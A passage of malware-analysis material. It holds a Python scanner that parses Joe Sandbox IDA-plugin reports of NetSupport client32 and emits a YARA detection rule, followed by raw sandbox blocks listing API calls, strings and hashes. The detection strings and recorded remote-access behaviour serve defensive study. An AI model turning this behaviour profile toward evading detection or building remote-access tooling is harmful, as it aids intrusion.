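# NetSupport-specific is this example's assumption, not a vetted signature.
NETSUPPORT_MARKERS = ("NSMW16Class", "CLTCONN.CPP", "\\nsmsrc\\nsm\\",
                      "NsStudentApp", "PolicyChanged", "UseNCS")
WM_COPYDATA = 0x004A  # the 0000004A uMsg in the SendMessage* calls above

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: list = field(default_factory=list)     # (name, module, [args], ref)
    strings: list = field(default_factory=list)  # String ID split on '$'

def parse_blocks(text):
    """One record per 'APIs' block; 'Part of subcall' lines are not counted."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            continue
        if not records or "Part of subcall" in line:
            continue
        rec, value = records[-1], line.split(": ", 1)[-1]
        if line.startswith("• Opcode ID: "):
            rec.opcode_id = value
        elif line.startswith("• String ID: "):
            rec.strings = [s for s in value.split("$") if s]
        elif m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append((m["name"], m["mod"], args, m["ref"]))
    return records

def marker_hits(rec):
    return sorted({m for s in rec.strings for m in NETSUPPORT_MARKERS if m in s})

def sends_wm_copydata(rec):
    """True if any SendMessage* call passes WM_COPYDATA (0x4A) as uMsg."""
    for name, _mod, args, _ref in rec.apis:
        if name.startswith("SendMessage") and len(args) > 1:
            try:
                if int(args[1], 16) == WM_COPYDATA:
                    return True
            except ValueError:
                pass
    return False

def scan(text):
    """Findings for functions with a marker string or WM_COPYDATA IPC."""
    findings = []
    for rec in parse_blocks(text):
        hits, copydata = marker_hits(rec), sends_wm_copydata(rec)
        if hits or copydata:
            findings.append({"first_ref": rec.apis[0][3] if rec.apis else None,
                             "opcode_id": rec.opcode_id, "markers": hits,
                             "wm_copydata": copydata})
    return findings

def to_yara(text, rule_name="netsupport_client32_strings"):
    """Emit a YARA rule from the marker-bearing strings (backslashes escaped)."""
    chosen, defs = [], []
    for rec in parse_blocks(text):
        chosen += [s for s in rec.strings if s not in chosen
                   and any(m in s for m in NETSUPPORT_MARKERS)]
    for i, s in enumerate(chosen):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        defs.append(f'        $s{i} = "{esc}" ascii wide')
    return (f"rule {rule_name} {{\n    strings:\n" + "\n".join(defs)
            + "\n    condition:\n        2 of them\n}")

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
    print(to_yara(SAMPLE))
```

Point scan() at the full report text and every function that talks to the NSMW16Class window over WM_COPYDATA, or that carries one of the listed strings, comes back with its first call address and Opcode ID, so the IDA snapshot can be opened at the right place; the "2 of them" condition in the generated rule is a starting point to tune, not a finished detection.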
                                                                                  APIs
                                                                                  • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                  • SendMessageA.USER32(00000000,0000004A,0006040E,?), ref: 1103D313
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                  • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                  • String ID: CLTCONN.CPP$NSMW16Class
                                                                                  • API String ID: 4104200039-3790257117
                                                                                  • Opcode ID: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                  • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                  • Opcode Fuzzy Hash: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                  • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
APIs
• SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
• MessageBeep.USER32(00000000), ref: 1113F1C9
• InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
• UpdateWindow.USER32(?), ref: 1113F21B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
• String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 490496107-2775872530
• Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
• Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
• Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
• Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
APIs
• GetClassNameA.USER32(?,?,00000080), ref: 110416E7
• GetWindowThreadProcessId.USER32(?,?), ref: 11041719
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
• LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
• CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
• FreeLibrary.KERNEL32(?), ref: 110417EE
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
• String ID: NSSWControl32$pcinssui.exe$psapi.dll
• API String ID: 2388757878-1455766584
• Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
• Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
• Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
• Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
APIs
• GetWindowTextLengthA.USER32(?), ref: 11023491
• GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
• ShowWindow.USER32(00000000), ref: 110234D7
• GetDlgItem.USER32(00000000,000013AB), ref: 11023521
• ShowWindow.USER32(00000000), ref: 11023524
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• GetDlgItem.USER32(00000000,?), ref: 1102356B
• EnableWindow.USER32(00000000,00000000), ref: 11023577
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 3823882759-1986719024
• Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
• Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
• Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
• Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• LoadLibraryA.KERNEL32(secur32.dll,50D94AA1,?,?,?), ref: 111470D1
• GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
• timeGetTime.WINMM(?,?), ref: 111470FC
• timeGetTime.WINMM(?,?), ref: 11147113
• GetLastError.KERNEL32(?,?), ref: 11147119
• FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
• String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
• API String ID: 2282859717-3523682560
• Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
• Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
• Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
• Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
APIs
• GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
• SelectObject.GDI32(?,?), ref: 11037872
• InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
• GetBkColor.GDI32(?), ref: 11037A5C
• InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
• InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
• GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
• DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
• DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
• SelectObject.GDI32(?,00000000), ref: 11037B49
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
• String ID:
• API String ID: 649858571-0
• Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
• Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
• Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
• Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
APIs
• SetFocus.USER32(?), ref: 110254CE
• GetDlgItem.USER32(?,00001396), ref: 110254E2
• CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
• ShowCaret.USER32(00000000), ref: 11025515
• DestroyCaret.USER32 ref: 11025529
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Caret$CreateDestroyFocusItemShow
• String ID:
• API String ID: 3189774202-0
• Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
• Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
• Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
• Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110351E0
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 11035267
• _memmove.LIBCMT ref: 1103528B
• _memmove.LIBCMT ref: 110352C5
• _memmove.LIBCMT ref: 110352E1
• std::exception::exception.LIBCMT ref: 1103532B
• __CxxThrowException@8.LIBCMT ref: 11035340
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Opcode ID: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
• Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
• Opcode Fuzzy Hash: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
• Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11019370
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 110193F7
• _memmove.LIBCMT ref: 1101941B
• _memmove.LIBCMT ref: 11019455
• _memmove.LIBCMT ref: 11019471
• std::exception::exception.LIBCMT ref: 110194BB
• __CxxThrowException@8.LIBCMT ref: 110194D0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Opcode ID: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
• Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
• Opcode Fuzzy Hash: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
• Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
APIs
  • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
• GetWindowRect.USER32(?,?), ref: 111194E1
• MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
• GetClientRect.USER32(?,?), ref: 11119508
• GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
• GetSystemMetrics.USER32(00000003), ref: 11119559
• GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
• GetSystemMetrics.USER32(00000002), ref: 11119576
Strings
• GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
• String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
• API String ID: 4172599486-2052393828
• Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
• Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
• Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
